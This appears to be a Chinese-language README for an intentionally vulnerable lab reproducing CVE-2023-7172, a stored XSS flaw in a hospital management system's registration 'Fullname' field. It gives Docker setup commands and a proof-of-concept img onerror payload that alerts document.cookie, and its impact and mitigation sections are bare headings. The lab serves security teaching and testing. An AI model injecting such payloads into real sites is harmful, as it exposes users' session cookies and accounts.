存储型跨站脚本(XSS)是一种严重的 Web 漏洞,允许将恶意代码注入网站,存储在数据库中,并在其他用户查看受感染页面时执行。在本案例中,该漏洞存在于医院管理系统(HMS)的用户登录页面中,其中“Fullname”参数容易受到存储型 XSS 攻击。由于缺乏适当的输入验证和数据清理,攻击者可以注入恶意脚本,从而可能危及用户账户、窃取敏感信息或执行未经授权的操作。
git clone https://github.com/sharathc213/CVE-2023-7172.git
cd CVE-2023-7172
docker-compose up -d
http://localhost:8080/hms/registration.php 的用户注册表单<img src="https://raw.githubusercontent.com/sharathc213/cve-2023-7173/main/x" onerror=alert(document.cookie)>

http://localhost:8080/hms/user-login.php 的登录页面。
医院管理系统中的存储型 XSS 漏洞可能造成严重后果,包括:
患者数据泄露:
患者安全风险:
未经授权的操作:
信任侵蚀:
监管不合规:
医疗服务中断:
法律和道德影响:
财务后果:
为解决此漏洞,请实施以下缓解措施:
此项目故意存在漏洞,仅应用于教育和测试目的。请勿在生产环境中部署。